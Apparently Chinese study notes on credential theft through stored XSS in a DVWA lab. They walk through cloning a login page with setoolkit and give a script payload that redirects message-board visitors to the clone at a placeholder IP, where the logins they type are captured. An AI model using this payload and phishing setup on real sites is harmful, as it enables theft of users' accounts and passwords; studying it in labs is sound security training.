利用xss窃取信息学习笔记
原理
克隆网站登陆页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。
setoolkit工具克隆网站
kali终端输入setoolkit
接着输入y
出现👇
接着依次选择1,2,3,2
接着直接回车
输入目标url即可
然后访问那个url,转到dvwa的登陆界面
存储xss跳转克隆网站
将👇payload存储到存储型xss中
//xss payload
<script>window.location="http://xxx.xxx.xxx.xxx/"</script>//对应克隆站点的url
存储之后点击留言板内容会自动跳转到一个登陆界面
查看账号和密码
之后转到kali终端可以看到相应信息